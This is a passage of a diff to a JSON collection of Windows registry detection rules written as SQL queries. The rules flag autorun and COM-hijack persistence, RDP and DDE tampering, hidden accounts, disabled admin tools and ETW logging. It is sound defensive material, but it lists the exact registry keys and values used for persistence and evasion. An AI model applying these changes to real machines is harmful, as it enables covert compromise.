NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": 
"EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.persistence", - "attack.execution", "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Winget Admin Settings Modification", + "id": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "status": "experimental", - "description": "Detects when an attacker modifies the registry 
value of the \"hhctrl\" to point to a custom binary", + "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence" ], "falsepositives": [ - "Unlikely" + "The event doesn't contain information about the type of change. False positives are expected with legitimate changes" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' AND TargetObject LIKE '\\\\REGISTRY\\\\A\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LocalState\\\\admin\\_settings' ESCAPE '\\')" ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_set_winget_admin_settings_tampering.yml" }, { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion" ], "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "Classes Autorun Keys Modification", 
- "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Installers and updaters may set currently in use files for rename after a reboot." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value 
modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND 
TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 
'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "status": "test", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + }, + { + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application 
crashes", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_persistence_chm.yml" }, { "title": "New DNS ServerLevelPluginDll Installed", 
@@ -33355,190 +33108,186 @@ "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN 
('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "ETW Logging Disabled For rpcrt4.dll", - "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", "status": "experimental", - "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.persistence", + "attack.t1546.015" ], 
"falsepositives": [ - "Unknown" + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR 